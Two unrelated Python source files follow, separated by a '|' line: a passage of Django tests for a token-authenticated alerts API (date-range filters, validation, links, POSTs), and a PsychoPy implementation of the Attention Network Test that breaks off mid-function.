flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
today = datetime.datetime.now()
yesterday = today - datetime.timedelta(days=1)
daybeforeyesterday = yesterday - datetime.timedelta(days=1)
alert1 = AlertFactory(
summary=u'alert 1',
flavor=flavor,
end_time=yesterday
)
alert2 = AlertFactory(
summary=u'alert 2',
flavor=flavor,
end_time=daybeforeyesterday
)
def test_scenario(end_time_start, end_time_end, expected):
qs = {
'flavors': flavor.slug,
}
if end_time_start:
qs['end_time_start'] = end_time_start
if end_time_end:
qs['end_time_end'] = end_time_end
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 200
data = json.loads(resp.content)
assert (
sorted([alert['summary'] for alert in data['alerts']]) ==
sorted(expected)
)
# Start yesterday at 00:00
test_scenario(
end_time_start=yesterday.strftime('%Y-%m-%dT00:00'),
end_time_end=None,
expected=[alert1.summary]
)
# Start today at 00:00
test_scenario(
end_time_start=today.strftime('%Y-%m-%dT00:00'),
end_time_end=None,
expected=[]
)
# End today at 23:59
test_scenario(
end_time_start=None,
end_time_end=today.strftime('%Y-%m-%dT23:59'),
expected=[alert1.summary, alert2.summary]
)
# End day before yesterday at 00:00
test_scenario(
end_time_start=None,
end_time_end=daybeforeyesterday.strftime('%Y-%m-%dT23:59'),
expected=[alert2.summary]
)
# Start daybeforeyesterday at 00:00 and end today at 23:59
test_scenario(
end_time_start=daybeforeyesterday.strftime('%Y-%m-%dT00:00'),
end_time_end=today.strftime('%Y-%m-%dT23:59'),
expected=[alert1.summary, alert2.summary]
)
def test_end_time_invalid(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
qs = {
'flavors': flavor.slug,
'end_time_start': 'one',
'end_time_end': 'one'
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
data = json.loads(resp.content)
assert (
data['detail']['end_time_start'][0]
.startswith('Datetime has wrong format')
)
assert (
data['detail']['end_time_end'][0]
.startswith('Datetime has wrong format')
)
qs = {
'flavors': flavor.slug,
'end_time_start': datetime.datetime.now(),
'end_time_end': (
datetime.datetime.now() - datetime.timedelta(days=1)
)
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
data = json.loads(resp.content)
assert (
data['detail'] ==
{'non_field_errors': [
u'end_time_start must occur before end_time_end.'
]}
)
def test_created(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
today = datetime.datetime.now()
yesterday = today - datetime.timedelta(days=1)
daybeforeyesterday = yesterday - datetime.timedelta(days=1)
alert1 = AlertFactory(summary=u'alert 1', flavor=flavor)
alert1.created = yesterday
alert1.save()
alert2 = AlertFactory(summary=u'alert 2', flavor=flavor)
alert2.created = daybeforeyesterday
alert2.save()
def test_scenario(created_start, created_end, expected):
qs = {
'flavors': flavor.slug,
}
if created_start:
qs['created_start'] = created_start
if created_end:
qs['created_end'] = created_end
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 200
data = json.loads(resp.content)
assert (
sorted([alert['summary'] for alert in data['alerts']]) ==
sorted(expected)
)
# Start yesterday at 00:00 yields alert1.
test_scenario(
created_start=yesterday.strftime('%Y-%m-%dT00:00'),
created_end=None,
expected=[alert1.summary]
)
# Start today at 00:00 yields nothing.
test_scenario(
created_start=today.strftime('%Y-%m-%dT00:00'),
created_end=None,
expected=[]
)
# End today at 23:59 yields both.
test_scenario(
created_start=None,
created_end=today.strftime('%Y-%m-%dT23:59'),
expected=[alert1.summary, alert2.summary]
)
# End day before yesterday at 00:00 yields alert2.
test_scenario(
created_start=None,
created_end=daybeforeyesterday.strftime('%Y-%m-%dT23:59'),
expected=[alert2.summary]
)
# Start daybeforeyesterday at 00:00 and end today at 23:59 yields
# both.
test_scenario(
created_start=daybeforeyesterday.strftime('%Y-%m-%dT00:00'),
created_end=today.strftime('%Y-%m-%dT23:59'),
expected=[alert1.summary, alert2.summary]
)
def test_created_invalid(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
qs = {
'flavors': flavor.slug,
'created_start': 'one',
'created_end': 'one'
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
data = json.loads(resp.content)
assert (
data['detail']['created_start'][0]
.startswith('Datetime has wrong format')
)
assert (
data['detail']['created_end'][0]
.startswith('Datetime has wrong format')
)
qs = {
'flavors': flavor.slug,
'created_start': datetime.datetime.now(),
'created_end': (
datetime.datetime.now() - datetime.timedelta(days=1)
)
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
data = json.loads(resp.content)
assert (
data['detail'] ==
{'non_field_errors': [
u'created_start must occur before created_end.'
]}
)
def test_links(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
alert = AlertFactory(summary=u'alert 1', flavor=flavor)
link = LinkFactory(alert=alert)
qs = {
'flavors': flavor.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 200
assert (
json.loads(resp.content) ==
{
u'count': 1,
u'total': 1,
u'alerts': [
{
u'id': WHATEVER,
u'summary': u'alert 1',
u'description': u'the account balance is at $5.',
u'flavor': flavor.slug,
u'emitter_version': 0,
u'emitter_name': u'balance-checker',
u'start_time': None,
u'end_time': None,
u'created': WHATEVER,
u'severity': 0,
u'links': [
{u'name': link.name, u'url': link.url}
]
}
]
}
)
class AlertsPostAPITest(TestCase):
def test_post(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
data = {
'severity': 5,
'summary': 'test alert',
'description': (
'All we ever see of stars are their old photographs.'
),
'flavor': flavor.slug,
'emitter_name': 'testemitter',
'emitter_version': 0
}
resp = self.client.post(
reverse('alerts-api'),
data=json.dumps(data),
content_type='application/json',
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 201
alert = Alert.objects.latest('id')
assert json.loads(resp.content) == {'detail': {'id': alert.id}}
assert alert.flavor.slug == flavor.slug
assert alert.severity == data['severity']
assert alert.summary == data['summary']
assert alert.emitter_name == data['emitter_name']
assert alert.emitter_version == data['emitter_version']
@override_settings(TIME_ZONE='America/Los_Angeles')
def test_post_with_dates(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
data = {
'severity': 5,
'summary': 'test alert',
'description': (
'All we ever see of stars are their old photographs.'
),
'flavor': flavor.slug,
'emitter_name': 'testemitter',
'emitter_version': 0,
'start_time': '2015-03-02T16:22:00Z',
'end_time': '2015-03-02T17:23:00Z'
}
resp = self.client.post(
reverse('alerts-api'),
data=json.dumps(data),
content_type='application/json',
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 201
alert = Alert.objects.latest('id')
assert json.loads(resp.content) == {'detail': {'id': alert.id}}
assert alert.start_time == datetime.datetime(2015, 3, 2, 8, 22, 0)
assert alert.end_time == datetime.datetime(2015, 3, 2, 9, 23, 0)
def test_post_invalid_start_time(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
data = {
'severity': 5,
'summary': 'test alert',
'description': (
'All we ever see of stars are their old photographs.'
),
'flavor': flavor.slug,
'emitter_name': 'testemitter',
'emitter_version': 0,
'start_time': '2015'
}
resp = self.client.post(
reverse('alerts-api'),
data=json.dumps(data),
content_type='application/json',
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
content = json.loads(resp.content)
assert (
content['detail']['start_time'][0]
.startswith(u'Datetime has wrong format.')
)
@override_settings(TIME_ZONE='America/Los_Angeles')
def test_post_start_time_timezone_change(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
data = {
'severity': 5,
'summary': 'test alert',
'description': (
'All we ever see of stars are their old photographs.'
),
'flavor': flavor.slug,
'emitter_name': 'testemitter',
'emitter_version': 0,
'start_time': '2015-03-02T16:22:00-0600',
'end_time': '2015-03-02T17:23:00-0600'
}
resp = self.client.post(
reverse('alerts-api'),
data=json.dumps(data),
content_type='application/json',
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 201
alert = Alert.objects.latest('id')
assert json.loads(resp.content) == {'detail': {'id': alert.id}}
assert alert.start_time == datetime.datetime(2015, 3, 2, 14, 22, 0)
assert alert.end_time == datetime.datetime(2015, 3, 2, 15, 23, 0)
@override_settings(TIME_ZONE='America/Los_Angeles')
def test_post_date_roundtrip(self):
"""Test we can POST a date and then GET the same date back"""
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
start_time = '2015-03-02T16:22:00Z'
data = {
'severity': 5,
'summary': 'test alert',
'description': (
'One if by land.'
),
'flavor': flavor.slug,
'emitter_name': 'testemitter',
'emitter_version': 0,
'start_time': start_time
}
resp = self.client.post(
reverse('alerts-api'),
data=json.dumps(data),
content_type='application/json',
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 201
alert = Alert.objects.latest('id')
assert json.loads(resp.content) == {'detail': {'id': alert.id}}
assert alert.start_time == datetime.datetime(2015, 3, 2, 8, 22, 0)
qs = {
'flavors': flavor.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 200
assert (
json.loads(resp.content) ==
{
u'count': 1,
u'total': 1,
u'alerts': [
{
u'id': WHATEVER,
u'summary': u'test alert',
u'description': u'One if by land.',
u'flavor': flavor.slug,
u'emitter_version': 0,
u'emitter_name': u'testemitter',
u'start_time': start_time,
u'end_time': None,
u'created': WHATEVER,
u'severity': 5,
u'links': [],
}
]
}
)
def test_post_with_link(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
data = {
'severity': 5,
'summary': 'test alert',
'description': (
'All we ever see of stars are their old photographs.'
),
'flavor': flavor.slug,
'emitter_name': 'testemitter',
'emitter_version': 0,
'links': [{'name': 'link', 'url': 'http://example.com/'}]
}
resp = self.client.post(
reverse('alerts-api'),
data=json.dumps(data),
content_type='application/json',
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 201
alert = Alert.objects.latest('id')
assert json.loads(resp.content) == {'detail': {'id': alert.id}}
links = Link.objects.filter(alert=alert)
assert len(links) == 1
assert links[0].name == 'link'
assert links[0].url == 'http://example.com/'
def test_invalid_links(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
# Missing link name
data = {
'severity': 5,
'summary': str(uuid4()),
'description': (
'All we ever see of stars are their old photographs.'
),
'flavor': flavor.slug,
'emitter_name': 'testemitter',
'emitter_version': 0,
'links': [{'url': 'http://example.com/'}]
}
resp = self.client.post(
reverse('alerts-api'),
data=json.dumps(data),
content_type='application/json',
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
assert (
json.loads(resp.content) ==
{
u'detail': {
u'links': [
u'Missing names or urls in link data. '
u"{u'url': u'http://example.com/'}"
]
}
}
)
assert Alert.objects.filter(summary=data['summary']).count() == 0
# Missing link url
data = {
'severity': 5,
'summary': str(uuid4()),
'description': (
'All we ever see of stars are their old photographs.'
),
'flavor': flavor.slug,
'emitter_name': 'testemitter',
'emitter_version': 0,
'links': [{'name': 'link'}]
}
resp = self.client.post(
reverse('alerts-api'),
data=json.dumps(data),
content_type='application/json',
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
assert (
json.loads(resp.content) ==
{
u'detail': {
u'links': [
u'Missing names or urls in link data. '
u"{u'name': u'link'}"
]
}
}
)
assert Alert.objects.filter(summary=data['summary']).count() == 0
|
|
"""
ANT (Attention Network Test) implemented in PsychoPy2
Created by Per Baekgaard / pgba@dtu.dk / baekgaard@b4net.dk, September 2015
Licensed under the MIT License:
Copyright (c) 2015,2016 Per Baekgaard, Technical University of Denmark, DTU Informatics, Cognitive Systems Section
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without
limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
__author__ = "Per Baekgaard"
__copyright__ = \
"Copyright (c) 2015, Per Baekgaard, Technical University of Denmark, DTU Informatics, Cognitive Systems Section"
__license__ = "MIT"
__version__ = "1.0"
__email__ = "pgba@dtu.dk"
__status__ = "Beta"
import sys
from psychopy import visual, core, event, monitors, tools
import pyglet
import time
import numpy as np
import random as random
class Bunch(object):
def __init__(self, **kwds):
self.__dict__.update(kwds)
# Experimental setup
class ANTExp:
"""This class implements the ANT (Attention Network Test) in PsychoPy2
To use this class, do something like the following:
# Create the ANT Experimental class
exp = ANTExp(mon, win, winsize, refresh, globalClock, startTime, alog)
# Show the instructions to the user
noPractice = exp.displayInstructions()
# Run the practice block
exp.practiceBlock():
# Run the real experiment as 3*2 runs
for r in range(6):
if r%2 == 0:
if exp.displayText("Starting experimental block %d of 3\nHit any key when ready to start." % (r/2+1), showLine=False):
break
core.wait(1)
block = exp.fullExperiment()
if block == None:
break
if allData == None:
allData = block
else:
allData = np.concatenate((allData, block))
# do something with allData
For a full description of the original experiment, see:
Jin Fan, Bruce D. McCandliss, Tobias Sommer, Amir Raz, and Michael I. Posner:
"Testing the Efficiency and Independence of Attentional Networks"
Journal of Cognitive Neuroscience 14:3, pp. 340-347 (2002)
"""
def _fixStim(self):
"""Returns a fixation cross '+' (as a visual) to be drawn later"""
a = self.cueSize/2.
vertices = [[0,0], [0,a], [0,-a], [0,0], [-a,0], [a,0], [0,0]]
return visual.ShapeStim(self.win, fillColor=None, lineColor='black',
lineWidth=self.allWidthPix, units='deg', vertices=vertices)
def _cueStim(self):
"""Returns a cue '*' (as a visual) to be drawn later"""
a = self.cueSize/2.
w = self.cueSize/20.
c1 = a*0.9511
s1 = a*0.3090
c2 = a*0.5878
s2 = a*0.8090
vertices = [[0,0], [0,a], [0,0], [c1, s1], [0,0], [c2, -s2], [0,0], [-c2, -s2], [0,0], [-c1, s1], [0,0]]
return visual.ShapeStim(self.win, fillColor=None, lineColor='black',
lineWidth=self.allWidthPix, units='deg', vertices=vertices)
def _drawLine(self, pos, sz, pw, short, tdir):
"""Return a tdir (left or right) line of width pw at pos of given sz,
making it possibly short (to make room for arrow heads)
"""
a = sz/2.
if short and tdir=='left':
vertices = [[a, pw], [-a/3.0, pw], [-a/3.0, -pw], [a, -pw]]
elif short and tdir=='right':
vertices = [[-a, pw], [a/3.0, pw], [a/3.0, -pw], [-a, -pw]]
else:
vertices = [[-a, pw], [a, pw], [a, -pw], [-a, -pw]]
return visual.ShapeStim(self.win, pos=pos, lineColor=None, fillColor='black', units='deg', vertices=vertices)
def _drawHead(self, pos, sz, pw, tdir):
"""Return an arrowhead (left or right, depending on tdir) fitting with a short line"""
a = sz/2.
if tdir=='left':
vertices = [[-a/3.0, a/3.0], [-a, 0], [-a/3.0, -a/3.0]]
elif tdir=='right':
vertices = [[a/3.0, a/3.0], [a, 0], [a/3.0, -a/3.0]]
return visual.ShapeStim(self.win, pos=pos, lineColor=None, fillColor='black', units='deg', vertices=vertices)
def _targetStim(self, tloc, tdir, flank):
"""Return a complete buffer of specified target at position tloc (top or down)
with flankers (congruent, neutral, or incongruent) in direction tdir (left or right)
ready to flip
"""
sz = self.arrowSize
pw = self.allWidthDeg
p = self.arrowSize + self.arrowSep
y = self.targetDist if tloc=='top' else -self.targetDist
if self.runDummy:
lines = [ self._drawLine((x, y), sz, pw, False, None) for x in (-2*p, -p, 0, p, 2*p) ]
heads = []
elif flank=='neutral':
lines = [ self._drawLine((x, y), sz, pw, False, None) for x in (-2*p, -p, p, 2*p) ]
lines = lines + [self._drawLine((0, y), sz, pw, True, tdir)]
heads = [ self._drawHead((0, y), sz, pw, tdir) ]
elif flank=='congruent':
lines = [ self._drawLine((x, y), sz, pw, True, tdir) for x in (-2*p, -p, 0, p, 2*p) ]
heads = [ self._drawHead((x, y), sz, pw, tdir) for x in (-2*p, -p, 0, p, 2*p) ]
elif flank=='incongruent':
rdir = 'left' if tdir=='right' else 'right'
lines = [ self._drawLine((x, y), sz, pw, True, rdir) for x in (-2*p, -p, p, 2*p) ]
heads = [ self._drawHead((x, y), sz, pw, rdir) for x in (-2*p, -p, p, 2*p) ]
lines = lines + [ self._drawLine((0, y), sz, pw, True, tdir) ]
heads = heads + [ self._drawHead((0, y), sz, pw, tdir) ]
return visual.BufferImageStim(self.win, stim=(lines + heads))
def __init__(self, mon, win, winsize, refreshRate, clock, startTime, logfile=None, runDummy=False, original=True):
"""Create an ANTExp class at the specified monitor/window of given size and refreshrate
mon -- the (PsychoPy) monitor spec; needed to determine correct scale
win -- the (PsychoPy) window visual on which you will run the experiment (should be full screen)
winsize -- (width, height) of the monitor in pixels
refreshRate -- the monitor refresh rate in frames pr second; needed to calculate proper frame timing
clock -- the (PsycoPy) clock which you use for measuring time within this experiment
startTime -- the walltime (epoch; seconds since Jan 1st 1970 00:00) that corresponds to clock==0.0
logFile -- an open file that is used for printing results to (if not given, then stdout is used)
runDummy -- removes arrowheads; can be used when no response is solicited from the user
original -- can be set to False to remove fixation crosses after the user has replied
"""
self.mon = mon
self.win = win
self.winsize = winsize
self.refreshRate = refreshRate
self.frameTime = 1.0 / refreshRate
self.clock = clock
self.startTime = startTime
self.logfile = logfile
self.runDummy = runDummy
self.original = original
if logfile:
logfile.write("wallt;t0;warning;position;direction;congruency;d1;ct;d2;rt;tf;response\n")
else:
print("wallt;t0;warning;position;direction;congruency;d1;ct;d2;rt;tf;response")
### BEGIN Semi-configurable values
# Timings for each 'procedure'
self.tD1min = 400 # Min initial fixation time
self.tD1max = 1600 # Max initial fixation time
self.tCue = 100 # Cue time
self.tNoCue = 400 # Time after cue before target
self.tOut = 1700 # Target timeout
self.tDummy = 700 # TIme to show target when running dummy
self.tExp = 4000 # Total procedure time
# Visual setup
self.arrowSize = 0.55 # Size of an arrow (visual angle)
self.arrowSep = 0.06 # Separation between arrows (visual angle)
self.cueSize = 0.35 # Size of the fixation and the cue (size from opensesame implementation)
self.allWidthDeg = 0.04 # Linewidth of stimuli (visual angle)
self.allWidthPix = tools.monitorunittools.deg2pix(self.allWidthDeg, mon) # Linewidth of stimuli (in pixels!)
self.targetDist = 1.06 # Vertical distance from fixation center to target center
### END (Semi-)configurable options
# Set up the experimental combinations, creating a list of all combinations of cue, location, direction and flankers
self.procedures = [Bunch()] * 48
i = 0
for cue in ('no', 'spatial', 'center', 'double'):
for tloc in ('top', 'bottom'):
for tdir in ('left', 'right'):
for flank in ('incongruent', 'neutral', 'congruent'):
self.procedures[i] = Bunch(cue=cue, tloc=tloc, tdir=tdir, flank=flank)
i += 1
# Create visual stimuli to be used (fixation cross and cues and all targets)
self.visFix = self._fixStim()
self.visCue = self._cueStim()
self.visTarget ={}
for tloc in ('top', 'bottom'):
for tdir in ('left', 'right'):
for flank in ('incongruent', 'neutral', 'congruent'):
self.visTarget[tloc+tdir+flank] = self._targetStim(tloc, tdir, flank)
def _oneProcedure(self, condition, short=False):
"""Presents one complete 'procedure' of (initial fixation, cue, wait, target and response and final delay)
Returns the timing for said procedure, using the clock set up initially or None if the user halted!
Expects to be called with "some time" before next flip, and returns immediately after the final flip
so it can be called repeatedly with no delays, and will then run the experiment at the expected timing
Overall procedure is like this -- for each stimuli to be show:
Draw stimuli to backbuffer
Wait until previous stimuli is done
Flip window and wait until retrace
(Repeat for next stimuli)
condition -- the condition requested (cue, tloc, pos)
short -- can be used to shorten the waiting time after the user has replied;
this can be helpful in the practice rounds (but was likely not present in the original experiment).
"""
def waitAndFlip(t):
"""Wait until next flip after time t (offset to self.clock) has passed, then flip (once only!)
Returns time of flip (also offset to self.clock)
"""
core.wait(t - self.clock.getTime() - self.frameTime, self.frameTime/2.0)
self.win.flip()
return self.clock.getTime()
quit = False
# Draw initial fixation cross and get start-time from the global clock (no previous stimuli)
self.visFix.draw()
self.win.flip()
t0 = self.clock.getTime()
# Pull a random waiting time
r = random.randrange(self.tD1min, self.tD1max, 10)
# Draw cue (if any)
if condition.cue != 'no':
if condition.cue == 'double' or (condition.cue == 'spatial' and condition.tloc == 'top'):
if self.original:
self.visFix.draw()
self.visCue.pos = (0, self.targetDist)
self.visCue.draw()
if condition.cue == 'double' or (condition.cue == 'spatial' and condition.tloc == 'bottom'):
if self.original:
self.visFix.draw()
self.visCue.pos = (0, -self.targetDist)
self.visCue.draw()
if condition.cue == 'center':
self.visCue.pos = (0, 0)
self.visCue.draw()
else:
self.visFix.draw()
# Wait random time and Present cue when ready
d1 = waitAndFlip(t0 + r/1000.0) - t0
# Draw fixation cross again
self.visFix.draw()
# Wait for cue time and present fixation cross again when ready
ct = waitAndFlip(t0 + d1 + 0.1) - t0 - d1
# Draw target
self.visTarget[condition.tloc+condition.tdir+condition.flank].draw()
if self.original:
self.visFix.draw()
# Wait for 2nd fixation time and Present target when ready
d2 = waitAndFlip(t0 + d1 + 0.1 + 0.4) - t0 - d1 - ct
# Discard any buffered events (we don't accept extremely fast reaction times here!)
event.clearEvents(eventType='keyboard')
# Wait for user response or timeout
if self.runDummy:
keys = event.waitKeys(maxWait = self.tDummy/1000.0-self.frameTime, timeStamped=self.clock)
else:
keys = event.waitKeys(maxWait = self.tOut/1000.0-self.frameTime, timeStamped=self.clock)
if keys is not None:
print("Got %s at %s expecting %s" % (keys[0][0], keys[0][1], condition.tdir))
if keys[0][0] == 'escape':
quit = True
resp = 'QUIT'
elif keys[0][0] == '0':
core.wait(100)
elif ((keys[0][0] == ('%s' % condition.tdir)) or
(keys[0][0] in ['f', 'a', 'z', 'q'] and condition.tdir=='left') or
(keys[0][0] in ['j', 'm', 'l', 'p'] and condition.tdir=='right')):
resp = 'OK'
else:
resp = 'NOK'
else:
print("TIMEOUT")
resp = None
rt = self.clock.getTime() - t0 - d2 - ct - d1
# 'Blank' the screen and wait until we're done with this trial (minus one final flip)
if self.original:
self.visFix.draw()
self.win.flip()
if self.original:
self.visFix.draw()
if not short:
tf = waitAndFlip(t0 + 4.0) - t0
else:
tf = self.clock.getTime() - t0
# print("At %0.3f/%0.3f [%s, %s, %s, %s]: d1=%0.3f, ct=%0.3f, d2=%0.3f, rt=%0.3f, tf=%0.3f, resp=%s" %
# (self.startTime+t0, t0, condition.cue, condition.tloc, condition.tdir, condition.flank, d1, ct, d2, rt, tf, resp))
if quit:
return None
else:
return (Bunch(condition=condition, wt=self.startTime+t0, t0=t0, d1=d1, ct=ct, d2=d2, rt=rt, tf=tf, resp=resp))
def practiceBlock(self, maxrun=24):
"""Run a practice block with maxrun=24 (no more than 48!) procedures"""
for i in random.sample(xrange(len(self.procedures)), len(self.procedures)):
res = self._oneProcedure(self.procedures[i], True) # True is probably not as original experiment
if res is None:
return False
self.win.flip()
if res.resp=='OK':
visual.TextStim(self.win, color='black', text="Correct reply (%0.3fs)" % (res.rt)).draw()
elif res.resp=='NOK':
visual.TextStim(self.win, color='red', text="Incorrect reply (%0.3fs)" % (res.rt)).draw()
else:
visual.TextStim(self.win, color='orange', text="No timely response recorded").draw()
self.win.flip()
core.wait(2)
maxrun -= 1
if maxrun==0:
return True
def fullExperiment(self, maxrun=None):
"""Run half of a real experiment in a random sequence (in total 48 target presentation)
Use maxrun to limit the number of runs (mainly useful for testing)
Returns a numpy array of (completed) procedures -- not in the order executed -- each row containing
* the (clock referenced) starting time t0,
* the index of the experiment,
* the warning type [0-3] (none, center, double or spatial),
* the congruency [0-2] (congruent, incongruent, neutral),
* the d1 timing (random waiting time before the cue, relative to t0)
* the cue timing (should be around 100ms)
* the time from cue to target (should be around 400ms)
* the users response time (max 1.7s)
* the total time until ready for next proceudre (should be around 4.0s)
* 1 if the user replied correctly, 0 otherwise
* 1 indicating a completed experiment; should always be 1 in the returned array
"""
expData = np.zeros((len(self.procedures), 11))
def c2s(condition, sep=';'):
return "%s%s%s%s%s%s%s" % (condition.cue, sep, condition.tloc, sep, condition.tdir, sep, condition.flank)
for i in random.sample(xrange(len(self.procedures)), len(self.procedures)):
res = self._oneProcedure(self.procedures[i])
if res is None:
return None
if self.logfile:
self.logfile.write("%0.3f;%0.3f;%s;%0.3f;%0.3f;%0.3f;%0.3f;%0.3f;%s\n" %
(res.wt, res.t0, c2s(res.condition), res.d1, res.ct, res.d2, res.rt, res.tf, res.resp))
else:
print("%0.3f;%0.3f;%s;%0.3f;%0.3f;%0.3f;%0.3f;%0.3f;%s" %
(res.wt, res.t0, c2s(res.condition), res.d1, res.ct, res.d2, res.rt, res.tf, res.resp))
cond = self.procedures[i]
if cond.cue=='no':
warningType = 0
elif cond.cue=='center':
warningType = 1
elif cond.cue=='double':
warningType = 2
elif cond.cue=='spatial':
warningType = 3
else:
sys.stderr.write("ERROR: Unknown cue '%s' in experiment. Programming error. Halting execution.\n" % cond.cue)
if cond.flank=='congruent':
congruency = 0
elif cond.flank=='incongruent':
congruency = 1
elif cond.flank=='neutral':
congruency = 2
else:
sys.stderr.write("ERROR: Unknown flank '%s' in experiment. Programming error. Halting execution.\n" % cond.flank)
expData[i] = (res.t0, i, warningType, congruency, res.d1, res.ct, res.d2, res.rt, res.tf, 1 if res.resp=='OK' else 0, 1)
if maxrun is not None:
maxrun -= 1
if maxrun==0:
break
return expData[expData[:,10]==1]
# The following text is adapted from the original (Visual Basic?) experiment
# For the validity of the rule of thumb, see
# Robert P O'Shea: "Thumb's rule tested: visual angle of thumb's width is about 2 deg."
# Perception June 1991 vol. 20 no. 3 415-418 (doi: 10.1068/p200415)
_instructions1 = 'This is an experiment investigating attention. You will be shown ' + \
'an arrow on the screen pointing either to the left or to the right, ' + \
'for example -> or <- . On some trials, the arrow will be flanked ' + \
'by two arrows to the left and two arrows to the right. Examples might be:\n' + \
'\n' + \
' ->->->->->\n' + \
'\n' + \
' ->-><-->->\n' + \
'\n' + \
'Your task is to respond to the direction of the CENTRAL arrow. You ' + \
'should press either "z", "a", "q", "f" or the left arrow your left finger if the ' + \
'central arrow points to the left or press the "m", "l", "p", "j" or right arrow ' + \
'with your right finger if the central arrow points to the right. Place ' + \
'your fingers on the keys you decide to use and keep them in position.\n' + \
'\n' + \
'Please place your eyes approx 60 cm from the screen. ' + \
'The line to the right should be approx 2.1 cm long and appear as 2 deg of visual angle ' + \
'(often the width of your thumb at an arms length is be 2 deg wide).\n' + \
'\n' + \
'Please make your response as quickly and accurately as possible. ' + \
'Your reaction time and accuracy will be recorded.\n' + \
'\n' + \
'There will be a cross + in the center of the screen and the arrows ' + \
'will appear either above or below the cross. You should try to ' + \
'fixate on the cross throughout the experiment.\n' + \
'\n' + \
'On some trials there will be asterisk cues indicating when or where ' + \
'the arrow will occur. If the cue is at the center or both above ' + \
'and below fixation it indicates that the arrow will appear shortly. ' + \
'If the cue is only above or below fixation it indicates both that ' + \
'the trial will occur shortly and where it will occur. Try to ' + \
'maintain fixation at all times. However, you may attend when and ' + \
'where indicated by the cues.\n' + \
'\n' + \
'Press any key to go to the next page.'
_instructions2 = 'The experiment contains four blocks. The first block is for practice ' + \
'and takes about two minutes. ' + \
'\n' + \
'The other three blocks are experimental blocks and each takes about ' + \
'five minutes. After each block there will be a message "take a ' + \
'break" and you may take a short rest. After it, you can press the ' + \
'space bar to begin the next block.\n' + \
'\n' + \
'The whole experiment takes about twenty minutes.\n' + \
'\n' + \
'Hitting the "escape" key will abort the experiment.\n' + \
'\n' + \
'If you have any question, please ask the experimenter.\n' + \
'\n' + \
'Press any key to start the practice session or hit the "escape" key to go directly to the experiment.'
def displayText(self, text, showLine=True, noWait=False, time=2):
"""Display some text and wait for the user to hit a key
noWait can be True, in which case the text is displayed for time seconds
showLine can be False if you don't want the 2 deg line next to the text
Returns True if the user hit 'escape' (presumably to abort/interrupt the run)
"""
self.win.flip()
visual.TextStim(self.win, alignHoriz='center', wrapWidth=12, height=0.01, color='black', text=text).draw()
if showLine:
visual.Line(self.win, start=(-7,-1), end=(-7,1), lineColor='black').draw()
visual.Line(self.win, start=(-7.1,-1), end=(-6.9,-1), lineColor='black').draw()
visual.Line(self.win, start=(-7.1,1), end=(-6.9,1), lineColor='black').draw()
self.win.flip()
if noWait:
